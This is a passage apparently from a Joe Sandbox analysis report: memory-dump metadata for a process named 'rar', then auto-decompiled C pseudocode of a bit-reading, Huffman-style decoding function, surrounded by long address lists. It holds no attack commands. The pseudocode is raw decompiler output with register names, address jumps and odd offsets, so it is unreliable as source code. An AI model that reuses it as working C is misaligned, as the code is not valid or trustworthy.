                                                                                                            0x7ff650b1b3c0
                                                                                                            0x7ff650b1b3c4
                                                                                                            0x7ff650b1b3c7
                                                                                                            0x7ff650b1b3cc
                                                                                                            0x7ff650b1b3d8
                                                                                                            0x7ff650b1b3e3
                                                                                                            0x7ff650b1b3e7
                                                                                                            0x7ff650b1b3ec
                                                                                                            0x7ff650b1b3f4
                                                                                                            0x7ff650b1b3fc
                                                                                                            0x7ff650b1b401
                                                                                                            0x7ff650b1b40b
                                                                                                            0x7ff650b1b40f
                                                                                                            0x7ff650b1b412
                                                                                                            0x7ff650b1b418
                                                                                                            0x7ff650b1b422
                                                                                                            0x7ff650b1b428
                                                                                                            0x7ff650b1b42d
                                                                                                            0x7ff650b1b436
                                                                                                            0x7ff650b1b43e
                                                                                                            0x7ff650b1b444
                                                                                                            0x7ff650b1b44d
                                                                                                            0x7ff650b1b450
                                                                                                            0x7ff650b1b456
                                                                                                            0x7ff650b1b464
                                                                                                            0x7ff650b1b46c
                                                                                                            0x7ff650b1b472
                                                                                                            0x7ff650b1b479
                                                                                                            0x7ff650b1b47f
                                                                                                            0x7ff650b1b489
                                                                                                            0x7ff650b1b48b
                                                                                                            0x7ff650b1b491
                                                                                                            0x7ff650b1b49d
                                                                                                            0x7ff650b1b4a3
                                                                                                            0x7ff650b1b4d5

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5abdddf9fd836fedfd04c8529920ed18d0a35a5f9479fe057f3b88b4573f1b8
                                                                                                            • Instruction ID: df51aacac897bb6f0b720230d7dbf59144119b866f18c8db8e381b664987904a
                                                                                                            • Opcode Fuzzy Hash: d5abdddf9fd836fedfd04c8529920ed18d0a35a5f9479fe057f3b88b4573f1b8
                                                                                                            • Instruction Fuzzy Hash: 4E52F3B2A086C3A5EB11DF20D4805ED77A1FB82788F484036DA8ED7799DE7EE645C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B662E0 Relevance: .6, Instructions: 605COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 43%
                                                                                                            			E00007FF67FF650B662E0(void* __edx, signed long long __rax, long long __rcx, void* __rdx, void* __r10) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				intOrPtr _t283;
				signed int _t304;
				signed int _t323;
				signed int _t375;
				unsigned int _t381;
				unsigned int _t384;
				signed char _t389;
				signed int _t390;
				signed int _t391;
				signed int _t394;
				signed char _t403;
				signed int _t404;
				signed int _t405;
				unsigned int _t418;
				signed int _t419;
				void* _t420;
				signed int _t421;
				signed int _t422;
				unsigned int _t430;
				signed int _t431;
				signed char _t435;
				signed int _t436;
				signed int _t437;
				signed int _t445;
				intOrPtr _t448;
				signed int _t451;
				signed int _t457;
				signed int _t475;
				unsigned int _t489;
				signed int _t507;
				void* _t533;
				void* _t559;
				signed long long _t578;
				void* _t579;
				void* _t580;
				signed long long _t586;
				signed long long _t589;
				signed long long _t593;
				void* _t595;
				unsigned long long _t600;
				unsigned long long _t602;
				unsigned long long _t603;
				unsigned long long _t608;
				void* _t610;
				unsigned int* _t611;
				void* _t613;
				signed long long* _t615;
				void* _t617;
				unsigned int _t622;
				void* _t625;
				void* _t626;
				void* _t628;
				intOrPtr* _t630;
				unsigned int _t632;
				unsigned int _t633;
				void* _t634;
				intOrPtr* _t636;
				void* _t642;
				intOrPtr* _t645;
				void* _t646;
				long long _t648;
				void* _t649;
				void* _t651;
				void* _t653;
				signed long long _t654;
				void* _t656;
				signed long long _t657;

				_t595 = __rdx;
				_t578 = __rax;
				 *((long long*)(_t625 + 8)) = __rcx;
				_t626 = _t625 - 0x48;
				r12d = 0;
				_t2 = _t595 + 8; // 0x8
				_t611 = _t2;
				_t580 = __rdx;
				r13d = 1;
				if ( *((intOrPtr*)(__rdx + 0x38)) != r12b) goto 0x50b66326;
				 *((intOrPtr*)(__rdx + 0x38)) = r13b;
				_t5 = _t595 + 0x3c; // 0x3c
				_t6 = _t595 + 0x24; // 0x24
				_t628 = _t6;
				if (E00007FF67FF650B61C18(__rcx, _t611, _t628, _t5, __r10) == 0) goto 0x50b66332;
				_t448 =  *((intOrPtr*)(_t580 + 0x24));
				if ( *_t611 -  *((intOrPtr*)(_t580 + 0x30)) + _t448 <= 0) goto 0x50b6633e;
				 *((intOrPtr*)(_t580 + 0x4adc)) = r13b;
				goto 0x50b66bb7;
				_t11 = _t580 + 0x4ae0; // 0x4ae0
				 *(_t580 + 0x4ae8) = r12d;
				_t283 =  *((intOrPtr*)(_t580 + 0x2c)) + _t448 - 1;
				_t451 =  *((intOrPtr*)(_t580 + 0x4ad8)) - 0x10;
				 *((intOrPtr*)(_t626 + 0xa0)) = _t283;
				 *(_t626 + 0x98) = _t451;
				r8d = _t451;
				r8d =  <  ? _t283 : r8d;
				 *(_t626 + 0xa8) = r8d;
				_t384 =  *_t611;
				if (_t384 - r8d < 0) goto 0x50b663bb;
				_t533 = _t384 - _t283;
				if (_t533 > 0) goto 0x50b66bb7;
				if (_t533 != 0) goto 0x50b6639b;
				if ( *((intOrPtr*)(_t580 + 0xc)) -  *((intOrPtr*)(_t580 + 0x28)) >= 0) goto 0x50b66bb7;
				if (_t384 - _t451 < 0) goto 0x50b663ac;
				if ( *((intOrPtr*)(_t580 + 0x4ade)) == r12b) goto 0x50b66bb0;
				_t615 = _t11;
				if (_t384 -  *((intOrPtr*)(_t580 + 0x4ad8)) >= 0) goto 0x50b66bb0;
				if ( *(_t580 + 0x4ae8) - __rcx - 8 <= 0) goto 0x50b66404;
				 *((intOrPtr*)(_t580 + 0x4aec)) = __rcx + __rcx;
				0x50b6ede8(_t656, _t653, _t651, _t649, _t610, _t613, _t617, _t579);
				if (_t578 != 0) goto 0x50b663f9;
				E00007FF67FF650B2CA48(_t578, 0x50ba7ab8);
				 *_t615 = _t578;
				_t657 =  *_t615;
				_t654 = _t578 + _t578 * 2;
				 *(_t580 + 0x4ae8) =  *(_t580 + 0x4ae8) + 1;
				_t648 = _t611[4];
				_t640 =  *_t611;
				r12d = _t611[1];
				 *((long long*)(_t626 + 0x28)) = _t648;
				_t457 = (( *( *_t611 + _t648 + 1) & 0x000000ff | ( *( *_t611 + _t648) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t640 + _t648 + 2) & 0x000000ff) >> 0x00000008 - r12d & 0x0000fffe;
				if (_t457 -  *((intOrPtr*)(_t580 + 0x1ffd942e9eb20)) >= 0) goto 0x50b6649c;
				_t389 = 0x10 -  *((intOrPtr*)(_t580 + 0xc0));
				r8d =  *((_t578 + _t578 * 2 << 2 >> _t389) + _t580 + 0xc4) & 0x000000ff;
				r8d = r8d + r12d;
				r12d = 0x10;
				r9d = r9d + (r8d >> 3);
				r8d = r8d & 0x00000007;
				 *_t611 = r9d;
				_t611[1] = r8d;
				goto 0x50b66511;
				r10d = 0xf;
				_t390 = _t389 + 1;
				if (_t390 - r10d >= 0) goto 0x50b664ca;
				r8d = _t390;
				_t630 = _t580 + (_t628 + 0x10) * 4;
				if (_t457 -  *_t630 < 0) goto 0x50b664c7;
				_t391 = _t390 + r13d;
				if (_t391 - r10d < 0) goto 0x50b664b4;
				goto 0x50b664ca;
				r10d = _t391;
				r8d = _t649 + __r10;
				r12d = 0x10;
				r8d = r8d & 0x00000007;
				r9d = r9d + (r8d >> 3);
				_t611[1] = r8d;
				 *_t611 = r9d;
				asm("sbb eax, eax");
				_t394 =  *(_t580 + 0xcc4 + _t578 * 2) & 0xffff;
				if (_t394 - 0x100 >= 0) goto 0x50b66589;
				r12d = 0;
				if ( *(_t580 + 0x4ae8) - r13d <= 0) goto 0x50b66578;
				_t600 = _t657 + _t654 * 4;
				if ( *((intOrPtr*)(_t600 - 0xc)) != r12d) goto 0x50b66578;
				_t304 =  *(_t600 - 8) & 0x0000ffff;
				_t71 = _t649 + 3; // 0x3
				r8d = _t71;
				if (_t304 - r8w >= 0) goto 0x50b66578;
				 *(_t600 - 8) = _t304 + r13w & 0x0000ffff;
				 *(_t578 + _t600 - 4) = _t394;
				 *(_t580 + 0x4ae8) =  *(_t580 + 0x4ae8) - 1;
				r8d =  *(_t626 + 0xa8);
				goto 0x50b6637e;
				 *(_t657 + _t654 * 4) = r12d;
				 *(_t657 + 8 + _t654 * 4) = _t394;
				 *((intOrPtr*)(_t657 + 4 + _t654 * 4)) = r12w;
				goto 0x50b66556;
				if (_t394 - 0x106 < 0) goto 0x50b6697d;
				if (0x7ff650ba79b2 - 8 >= 0) goto 0x50b665a5;
				goto 0x50b66612;
				r10d = 0x7ff650ba79b2;
				r10d = r10d >> 2;
				r10d = r10d - r13d;
				if (r10d == 0) goto 0x50b66612;
				_t585 = r9d;
				r8d = r8d + r10d;
				r9d = r9d + (r8d >> 3);
				 *_t611 = r9d;
				r8d = r8d & 0x00000007;
				_t611[1] = r8d;
				_t586 = r9d;
				_t475 = (( *(_t586 + _t648 + 1) & 0x000000ff | ( *(_t586 + _t648) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t586 + _t648 + 2) & 0x000000ff) >> 0x00000008 - r8d & 0x0000fffe;
				if (_t475 -  *((intOrPtr*)(_t580 + 0xf2c + _t586 * 4)) >= 0) goto 0x50b66687;
				_t403 = r12d -  *((intOrPtr*)(_t580 + 0xfac));
				r11d =  *((_t600 >> _t403) + _t580 + 0xfb0) & 0x000000ff;
				r11d = r11d + r8d;
				r12d = r11d;
				r12d = r12d >> 3;
				r12d = r12d + r9d;
				r11d = r11d & 0x00000007;
				 *_t611 = r12d;
				_t611[1] = r11d;
				goto 0x50b66707;
				r13d = 0xf;
				_t404 = _t403 + 1;
				if (_t404 - r13d >= 0) goto 0x50b666b7;
				r10d = _t404;
				_t645 = _t580 + (__r10 + 0x3cb) * 4;
				if (_t475 -  *_t645 < 0) goto 0x50b666b4;
				_t405 = _t404 + 1;
				_t646 = _t645 + 4;
				if (_t405 - r13d < 0) goto 0x50b666a2;
				goto 0x50b666b7;
				r13d = _t405;
				r11d = _t630 + 4 + _t651;
				r12d = r11d;
				r11d = r11d & 0x00000007;
				_t611[1] = r11d;
				r12d = r12d >> 3;
				r12d = r12d + r9d;
				 *_t611 = r12d;
				r13d = 1;
				asm("sbb eax, eax");
				_t323 =  *(_t580 + 0x1bb0 + _t578 * 2) & 0xffff;
				 *(_t626 + 0x20) = r12d;
				if (_t323 - 4 >= 0) goto 0x50b6671f;
				r9d = _t578 + 1;
				goto 0x50b6693b;
				r10d = _t323;
				r10d = r10d >> 1;
				r10d = r10d - r13d;
				r13d = r13d & _t323;
				r13d = r13d | 0x00000002;
				r13d = r13d << r10d;
				r13d = r13d + 1;
				r9d = r13d;
				if (r10d == 0) goto 0x50b6693b;
				_t559 = r10d - 4;
				if (_t559 < 0) goto 0x50b668cb;
				if (_t559 <= 0) goto 0x50b667ce;
				_t632 = r12d;
				r9d =  *(_t632 +  *((intOrPtr*)(_t626 + 0x28)) + 4) & 0x000000ff;
				r9d = r9d >> 8 -  *((intOrPtr*)(_t580 + 0xc));
				_t588 =  *((intOrPtr*)(_t626 + 0x28));
				r11d = r11d + 0xfffffffc;
				r11d = r11d + r10d;
				r9d = r9d | ((( *(_t632 +  *((intOrPtr*)(_t626 + 0x28)) + 1) & 0x000000ff | ( *(_t632 +  *((intOrPtr*)(_t626 + 0x28))) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t632 + _t588 + 2) & 0x000000ff) << 0x00000008 |  *(_t632 + _t588 + 3) & 0x000000ff) << r11d;
				r9d = r9d >> 0x24 - r10d;
				r9d = r9d << 4;
				r9d = r9d + r13d;
				_t489 = (r11d >> 3) + r12d;
				r11d = r11d & 0x00000007;
				 *(_t626 + 0x20) = _t489;
				_t611[1] = r11d;
				 *_t611 = _t489;
				_t589 = _t611[4];
				_t602 = _t489;
				r8d =  *(_t602 + _t589) & 0x000000ff;
				r8d = r8d << 8;
				r8d = r8d |  *(_t602 + _t589 + 1) & 0x000000ff;
				r8d = r8d << 8;
				r8d = r8d |  *(_t602 + _t589 + 2) & 0x000000ff;
				r8d = r8d >> 8 - r11d;
				r8d = r8d & 0x0000fffe;
				if (r8d -  *((intOrPtr*)(_t580 + 0x1e18 + _t589 * 4)) >= 0) goto 0x50b66849;
				_t603 = _t602 >> 0x10 -  *((intOrPtr*)(_t580 + 0x1e98));
				_t418 = ( *(_t603 + _t580 + 0x1e9c) & 0x000000ff) + r11d;
				_t419 = _t418 & 0x00000007;
				 *_t611 = (_t418 >> 3) +  *(_t626 + 0x20);
				_t611[1] = _t419;
				goto 0x50b668c3;
				r10d = 0xf;
				_t420 = _t419 + 1;
				if (_t420 - r10d >= 0) goto 0x50b66878;
				if (r8d -  *((intOrPtr*)(_t580 + (_t603 + 0x786) * 4)) < 0) goto 0x50b66875;
				_t421 = _t420 + 1;
				if (_t421 - r10d < 0) goto 0x50b66863;
				goto 0x50b66878;
				r10d = _t421;
				_t422 = _t648 + _t646;
				 *_t611 = (_t422 >> 3) +  *(_t626 + 0x20);
				_t611[1] = _t422 & 0x00000007;
				r8d = r8d -  *((intOrPtr*)(_t580 + 0x1e18 + _t578 * 4));
				r8d = r8d >> 0x10 - r10d;
				asm("sbb eax, eax");
				r9d = r9d + ( *(_t580 + 0x2a9c + _t578 * 2) & 0xffff);
				goto 0x50b6693b;
				_t633 = r12d;
				r9d =  *(_t633 +  *((intOrPtr*)(_t626 + 0x28)) + 4) & 0x000000ff;
				r9d = r9d >> 8 -  *((intOrPtr*)(_t580 + 0xc));
				r9d = r9d | ((( *(_t633 +  *((intOrPtr*)(_t626 + 0x28)) + 1) & 0x000000ff | ( *(_t633 +  *((intOrPtr*)(_t626 + 0x28))) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t633 +  *((intOrPtr*)(_t626 + 0x28)) + 2) & 0x000000ff) << 0x00000008 |  *(_t633 + _t591 + 3) & 0x000000ff) << r11d;
				r9d = r9d >> 0x20 - r10d;
				_t430 = _t648 + _t646;
				r9d = r9d + r13d;
				_t431 = _t430 & 0x00000007;
				 *_t611 = (_t430 >> 3) + r12d;
				_t611[1] = _t431;
				r13d = 1;
				if (r9d - 0x100 <= 0) goto 0x50b66964;
				if (r9d - 0x2000 <= 0) goto 0x50b66964;
				if (r9d - 0x40000 <= 0) goto 0x50b66964;
				 *((short*)(_t657 + 4 + _t654 * 4)) = (6 << r10d) + 2 + ((((( *(r9d + _t648) & 0x000000ff) << 0x00000008 |  *(r9d + _t648 + 1) & 0x000000ff) << 0x00000008 |  *(_t585 + _t648 + 2) & 0x000000ff) >> 0x00000008 - r8d & 0x0000ffff) >> r12d - r10d) + 1 + r13d + r13d;
				 *(_t657 + _t654 * 4) = r13d;
				 *(_t657 + 8 + _t654 * 4) = r9d;
				goto 0x50b669f1;
				if (_t431 != 0x100) goto 0x50b669e1;
				_t199 = _t626 + 0x30; // 0x40
				_t634 = _t199;
				E00007FF67FF650B60F44(_t580,  *((intOrPtr*)(_t626 + 0x90)), _t611, _t615,  *((intOrPtr*)(_t626 + 0x90)), _t634);
				 *((short*)(_t657 + 4 + _t654 * 4)) =  *(_t626 + 0x30) & 0x000000ff;
				 *(_t657 + 8 + _t654 * 4) =  *(_t626 + 0x34);
				 *(_t657 + _t654 * 4) = 4;
				_t593 =  *_t615;
				_t608 = _t578 + _t578 * 2;
				 *(_t580 + 0x4ae8) =  *(_t580 + 0x4ae8) + 1;
				 *((short*)(_t593 + 4 + _t608 * 4)) =  *(_t626 + 0x3c) & 0x000000ff;
				 *((intOrPtr*)(_t593 + 8 + _t608 * 4)) =  *((intOrPtr*)(_t626 + 0x38));
				 *(_t593 + _t608 * 4) = 4;
				goto 0x50b669f1;
				if (_t431 != 0x101) goto 0x50b66a16;
				 *(_t657 + _t654 * 4) = 2;
				r8d =  *(_t626 + 0xa8);
				_t227 = _t580 + 0x4ae0; // 0x4ae0
				_t642 = _t227;
				r12d = 0;
				goto 0x50b6637e;
				 *(_t657 + _t654 * 4) = 3;
				 *(_t657 + 8 + _t654 * 4) = _t593 - 0x102;
				_t647 =  *_t611;
				_t622 = _t611[4];
				r11d = _t611[1];
				_t507 = (( *( *_t611 + _t622 + 1) & 0x000000ff | ( *( *_t611 + _t622) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t647 + _t622 + 2) & 0x000000ff) >> 0x00000008 - r11d & 0x0000fffe;
				if (_t507 -  *((intOrPtr*)(_t580 + 0x2d04 + _t593 * 4)) >= 0) goto 0x50b66aa4;
				_t435 = r12d -  *((intOrPtr*)(_t580 + 0x2d84));
				r8d =  *((_t608 >> _t435) + _t580 + 0x2d88) & 0x000000ff;
				r8d = r8d + r11d;
				r11d = r8d;
				r11d = r11d >> 3;
				r11d = r11d + r10d;
				r8d = r8d & 0x00000007;
				 *_t611 = r11d;
				_t611[1] = r8d;
				goto 0x50b66b1d;
				r9d = 0xf;
				_t436 = _t435 + 1;
				if (_t436 - r9d >= 0) goto 0x50b66ad5;
				r8d = _t436;
				_t636 = _t580 + (_t634 + 0xb41) * 4;
				if (_t507 -  *_t636 < 0) goto 0x50b66ad2;
				_t437 = _t436 + r13d;
				if (_t437 - r9d < 0) goto 0x50b66abf;
				goto 0x50b66ad5;
				r9d = _t437;
				r8d = _t648 + _t642;
				r11d = r8d;
				r8d = r8d & 0x00000007;
				_t611[1] = r8d;
				r11d = r11d >> 3;
				r11d = r11d + r10d;
				 *_t611 = r11d;
				asm("sbb eax, eax");
				_t375 =  *(_t580 + 0x3988 + _t578 * 2) & 0xffff;
				r12d = 0;
				if (_t375 - 8 >= 0) goto 0x50b66b2e;
				r10d = _t578 + 2;
				goto 0x50b66b9d;
				r9d = _t375;
				r10d = 3;
				r10d = r10d & _t375;
				r9d = r9d >> 2;
				r10d = r10d | 0x00000004;
				r9d = r9d - r13d;
				r10d = r10d << r9d;
				r10d = r10d + 2;
				if (r9d == 0) goto 0x50b66b9d;
				_t594 = r11d;
				_t445 = _t642 + _t636 + 4;
				r10d = r10d + (((( *(r11d + _t622 + 1) & 0x000000ff | ( *(r11d + _t622) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t594 + _t622 + 2) & 0x000000ff) >> 0x00000008 - r8d & 0x0000ffff) >> 0x10 - r9d);
				_t381 = (_t445 >> 3) + r11d;
				 *_t611 = _t381;
				_t611[1] = _t445 & 0x00000007;
				 *((intOrPtr*)(_t657 + 4 + _t654 * 4)) = r10w;
				goto 0x50b66556;
				 *((intOrPtr*)(_t580 + 0x4adf)) = r13b;
				return _t381;
			}









































































                                                                                                            0x7ff650b662e0
                                                                                                            0x7ff650b662e0
                                                                                                            0x7ff650b662e0
                                                                                                            0x7ff650b662f1
                                                                                                            0x7ff650b662f5
                                                                                                            0x7ff650b662f8
                                                                                                            0x7ff650b662f8
                                                                                                            0x7ff650b662fc
                                                                                                            0x7ff650b66302
                                                                                                            0x7ff650b6630c
                                                                                                            0x7ff650b6630e
                                                                                                            0x7ff650b66312
                                                                                                            0x7ff650b66316
                                                                                                            0x7ff650b66316
                                                                                                            0x7ff650b66324
                                                                                                            0x7ff650b66329
                                                                                                            0x7ff650b66330
                                                                                                            0x7ff650b66332
                                                                                                            0x7ff650b66339
                                                                                                            0x7ff650b66341
                                                                                                            0x7ff650b6634a
                                                                                                            0x7ff650b66351
                                                                                                            0x7ff650b6635c
                                                                                                            0x7ff650b6635f
                                                                                                            0x7ff650b66368
                                                                                                            0x7ff650b6636f
                                                                                                            0x7ff650b66372
                                                                                                            0x7ff650b66376
                                                                                                            0x7ff650b6637e
                                                                                                            0x7ff650b66383
                                                                                                            0x7ff650b66385
                                                                                                            0x7ff650b66387
                                                                                                            0x7ff650b6638d
                                                                                                            0x7ff650b66395
                                                                                                            0x7ff650b6639d
                                                                                                            0x7ff650b663a6
                                                                                                            0x7ff650b663ac
                                                                                                            0x7ff650b663b5
                                                                                                            0x7ff650b663ca
                                                                                                            0x7ff650b663d6
                                                                                                            0x7ff650b663e0
                                                                                                            0x7ff650b663eb
                                                                                                            0x7ff650b663f4
                                                                                                            0x7ff650b663f9
                                                                                                            0x7ff650b6640f
                                                                                                            0x7ff650b66412
                                                                                                            0x7ff650b66418
                                                                                                            0x7ff650b6641e
                                                                                                            0x7ff650b66422
                                                                                                            0x7ff650b66425
                                                                                                            0x7ff650b6642c
                                                                                                            0x7ff650b66454
                                                                                                            0x7ff650b6645e
                                                                                                            0x7ff650b66467
                                                                                                            0x7ff650b6646c
                                                                                                            0x7ff650b66475
                                                                                                            0x7ff650b66478
                                                                                                            0x7ff650b66484
                                                                                                            0x7ff650b66487
                                                                                                            0x7ff650b6648b
                                                                                                            0x7ff650b6648e
                                                                                                            0x7ff650b6649a
                                                                                                            0x7ff650b6649c
                                                                                                            0x7ff650b664a2
                                                                                                            0x7ff650b664a7
                                                                                                            0x7ff650b664a9
                                                                                                            0x7ff650b664b0
                                                                                                            0x7ff650b664b7
                                                                                                            0x7ff650b664b9
                                                                                                            0x7ff650b664c3
                                                                                                            0x7ff650b664c5
                                                                                                            0x7ff650b664c7
                                                                                                            0x7ff650b664ca
                                                                                                            0x7ff650b664ce
                                                                                                            0x7ff650b664dd
                                                                                                            0x7ff650b664e1
                                                                                                            0x7ff650b664e4
                                                                                                            0x7ff650b664e8
                                                                                                            0x7ff650b66505
                                                                                                            0x7ff650b66511
                                                                                                            0x7ff650b6651a
                                                                                                            0x7ff650b6651c
                                                                                                            0x7ff650b66526
                                                                                                            0x7ff650b66528
                                                                                                            0x7ff650b66530
                                                                                                            0x7ff650b66532
                                                                                                            0x7ff650b66536
                                                                                                            0x7ff650b66536
                                                                                                            0x7ff650b6653f
                                                                                                            0x7ff650b66548
                                                                                                            0x7ff650b6654c
                                                                                                            0x7ff650b66550
                                                                                                            0x7ff650b66556
                                                                                                            0x7ff650b66573
                                                                                                            0x7ff650b66578
                                                                                                            0x7ff650b6657c
                                                                                                            0x7ff650b66581
                                                                                                            0x7ff650b66587
                                                                                                            0x7ff650b6658f
                                                                                                            0x7ff650b6659e
                                                                                                            0x7ff650b665a3
                                                                                                            0x7ff650b665a5
                                                                                                            0x7ff650b665af
                                                                                                            0x7ff650b665b6
                                                                                                            0x7ff650b665c4
                                                                                                            0x7ff650b665c6
                                                                                                            0x7ff650b665ee
                                                                                                            0x7ff650b66600
                                                                                                            0x7ff650b66607
                                                                                                            0x7ff650b6660a
                                                                                                            0x7ff650b6660e
                                                                                                            0x7ff650b66612
                                                                                                            0x7ff650b66640
                                                                                                            0x7ff650b6664d
                                                                                                            0x7ff650b66654
                                                                                                            0x7ff650b66659
                                                                                                            0x7ff650b66662
                                                                                                            0x7ff650b66665
                                                                                                            0x7ff650b66668
                                                                                                            0x7ff650b6666c
                                                                                                            0x7ff650b6666f
                                                                                                            0x7ff650b66673
                                                                                                            0x7ff650b66676
                                                                                                            0x7ff650b66682
                                                                                                            0x7ff650b66687
                                                                                                            0x7ff650b6668d
                                                                                                            0x7ff650b66692
                                                                                                            0x7ff650b66694
                                                                                                            0x7ff650b6669e
                                                                                                            0x7ff650b666a5
                                                                                                            0x7ff650b666a7
                                                                                                            0x7ff650b666a9
                                                                                                            0x7ff650b666b0
                                                                                                            0x7ff650b666b2
                                                                                                            0x7ff650b666b4
                                                                                                            0x7ff650b666b7
                                                                                                            0x7ff650b666c7
                                                                                                            0x7ff650b666ca
                                                                                                            0x7ff650b666ce
                                                                                                            0x7ff650b666d2
                                                                                                            0x7ff650b666d6
                                                                                                            0x7ff650b666d9
                                                                                                            0x7ff650b666e6
                                                                                                            0x7ff650b666fb
                                                                                                            0x7ff650b66707
                                                                                                            0x7ff650b6670d
                                                                                                            0x7ff650b66714
                                                                                                            0x7ff650b66716
                                                                                                            0x7ff650b6671a
                                                                                                            0x7ff650b6671f
                                                                                                            0x7ff650b66722
                                                                                                            0x7ff650b66725
                                                                                                            0x7ff650b66728
                                                                                                            0x7ff650b6672b
                                                                                                            0x7ff650b66732
                                                                                                            0x7ff650b66735
                                                                                                            0x7ff650b66738
                                                                                                            0x7ff650b6673e
                                                                                                            0x7ff650b66744
                                                                                                            0x7ff650b66748
                                                                                                            0x7ff650b6674e
                                                                                                            0x7ff650b6675d
                                                                                                            0x7ff650b66760
                                                                                                            0x7ff650b66768
                                                                                                            0x7ff650b6676b
                                                                                                            0x7ff650b66799
                                                                                                            0x7ff650b6679f
                                                                                                            0x7ff650b667a2
                                                                                                            0x7ff650b667b0
                                                                                                            0x7ff650b667b3
                                                                                                            0x7ff650b667ba
                                                                                                            0x7ff650b667bd
                                                                                                            0x7ff650b667c0
                                                                                                            0x7ff650b667c4
                                                                                                            0x7ff650b667c8
                                                                                                            0x7ff650b667cc
                                                                                                            0x7ff650b667ce
                                                                                                            0x7ff650b667d2
                                                                                                            0x7ff650b667da
                                                                                                            0x7ff650b667df
                                                                                                            0x7ff650b667e3
                                                                                                            0x7ff650b667eb
                                                                                                            0x7ff650b667f4
                                                                                                            0x7ff650b667fa
                                                                                                            0x7ff650b66803
                                                                                                            0x7ff650b66812
                                                                                                            0x7ff650b66820
                                                                                                            0x7ff650b6682b
                                                                                                            0x7ff650b66837
                                                                                                            0x7ff650b6683a
                                                                                                            0x7ff650b6683c
                                                                                                            0x7ff650b66847
                                                                                                            0x7ff650b66849
                                                                                                            0x7ff650b6684f
                                                                                                            0x7ff650b66854
                                                                                                            0x7ff650b66866
                                                                                                            0x7ff650b66868
                                                                                                            0x7ff650b66871
                                                                                                            0x7ff650b66873
                                                                                                            0x7ff650b66875
                                                                                                            0x7ff650b66878
                                                                                                            0x7ff650b66888
                                                                                                            0x7ff650b6688e
                                                                                                            0x7ff650b66899
                                                                                                            0x7ff650b668a4
                                                                                                            0x7ff650b668b7
                                                                                                            0x7ff650b668c6
                                                                                                            0x7ff650b668c9
                                                                                                            0x7ff650b668d8
                                                                                                            0x7ff650b668db
                                                                                                            0x7ff650b668e3
                                                                                                            0x7ff650b6691e
                                                                                                            0x7ff650b66921
                                                                                                            0x7ff650b66924
                                                                                                            0x7ff650b6692a
                                                                                                            0x7ff650b66933
                                                                                                            0x7ff650b66936
                                                                                                            0x7ff650b66938
                                                                                                            0x7ff650b6693b
                                                                                                            0x7ff650b66948
                                                                                                            0x7ff650b66953
                                                                                                            0x7ff650b6695f
                                                                                                            0x7ff650b66964
                                                                                                            0x7ff650b66972
                                                                                                            0x7ff650b66976
                                                                                                            0x7ff650b6697b
                                                                                                            0x7ff650b66983
                                                                                                            0x7ff650b66985
                                                                                                            0x7ff650b66985
                                                                                                            0x7ff650b66990
                                                                                                            0x7ff650b6699a
                                                                                                            0x7ff650b669a4
                                                                                                            0x7ff650b669a9
                                                                                                            0x7ff650b669b7
                                                                                                            0x7ff650b669ba
                                                                                                            0x7ff650b669c0
                                                                                                            0x7ff650b669cb
                                                                                                            0x7ff650b669d4
                                                                                                            0x7ff650b669d8
                                                                                                            0x7ff650b669df
                                                                                                            0x7ff650b669e7
                                                                                                            0x7ff650b669e9
                                                                                                            0x7ff650b669f1
                                                                                                            0x7ff650b669f9
                                                                                                            0x7ff650b669f9
                                                                                                            0x7ff650b66a07
                                                                                                            0x7ff650b66a11
                                                                                                            0x7ff650b66a1b
                                                                                                            0x7ff650b66a25
                                                                                                            0x7ff650b66a2f
                                                                                                            0x7ff650b66a32
                                                                                                            0x7ff650b66a36
                                                                                                            0x7ff650b66a60
                                                                                                            0x7ff650b66a6d
                                                                                                            0x7ff650b66a74
                                                                                                            0x7ff650b66a79
                                                                                                            0x7ff650b66a82
                                                                                                            0x7ff650b66a85
                                                                                                            0x7ff650b66a88
                                                                                                            0x7ff650b66a8c
                                                                                                            0x7ff650b66a8f
                                                                                                            0x7ff650b66a93
                                                                                                            0x7ff650b66a96
                                                                                                            0x7ff650b66aa2
                                                                                                            0x7ff650b66aa4
                                                                                                            0x7ff650b66aaa
                                                                                                            0x7ff650b66aaf
                                                                                                            0x7ff650b66ab1
                                                                                                            0x7ff650b66abb
                                                                                                            0x7ff650b66ac2
                                                                                                            0x7ff650b66ac4
                                                                                                            0x7ff650b66ace
                                                                                                            0x7ff650b66ad0
                                                                                                            0x7ff650b66ad2
                                                                                                            0x7ff650b66ad5
